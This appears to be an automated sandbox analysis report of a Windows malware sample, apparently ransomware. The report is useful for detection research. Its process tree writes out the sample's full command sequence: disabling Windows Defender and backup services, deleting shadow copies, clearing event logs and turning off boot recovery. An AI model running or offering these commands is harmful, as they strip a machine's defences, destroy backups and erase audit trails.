3112 wrote to memory of 3240 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3240 wrote to memory of 2748 3240 net.exe net1.exe PID 3240 wrote to memory of 2748 3240 net.exe net1.exe PID 3112 wrote to memory of 1308 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 1308 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1308 wrote to memory of 1160 1308 net.exe net1.exe PID 1308 wrote to memory of 1160 1308 net.exe net1.exe PID 3112 wrote to memory of 716 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 716 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 716 wrote to memory of 720 716 net.exe net1.exe PID 716 wrote to memory of 720 716 net.exe net1.exe PID 3112 wrote to memory of 1788 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 1788 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1788 wrote to memory of 2200 1788 net.exe net1.exe PID 1788 wrote to memory of 2200 1788 net.exe net1.exe PID 3112 wrote to memory of 596 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 596 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 964 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 964 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1156 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1156 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1468 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1468 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 2388 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 2388 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1968 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1968 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1944 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1944 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 2440 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 2440 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1868 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 1868 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe sc.exe PID 3112 wrote to memory of 2404 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 2404 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 3656 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 3656 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 1052 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 1052 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 3368 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 3368 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 3152 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe PID 3112 wrote to memory of 3152 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3032
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1524
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3572
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4064
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1008
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2748
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1160
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:720
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12a0b" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12a0b" /y3⤵PID:2200
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:596
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:964
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1156
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1468
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2388
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1968
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1944
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2440
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12a0b" start= disabled2⤵PID:1868
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2404
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3656
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1052
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3368
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3748
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2004
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:696
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3772
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:500
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:652
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1000
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:60
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3280
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2216
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3384
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2752
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:604
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1356
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1036
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3940
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2508
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1316
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1448
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1672 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2232 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3224 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2860
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2760
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3744
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3172 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:868
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3788 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4064 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:720 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2200 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1444
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1116 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:700
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
fe58cf0a724a75cd8b670b1a45ff3373
SHA1f7399d078a2f6e9681ab009d95bf7951d89e2058
SHA256232835ad6008f18ceff265489e29fc3d15edd76fa4254f0e6fec96f3ddb5c245
SHA512193fcc18f42a1750290877da4529f4b76f91eda19063650b3d62a3716e09f9b69b391be429b853847bdfa872f3fd9d9ab6ef340e911f492c271531bf09da4dea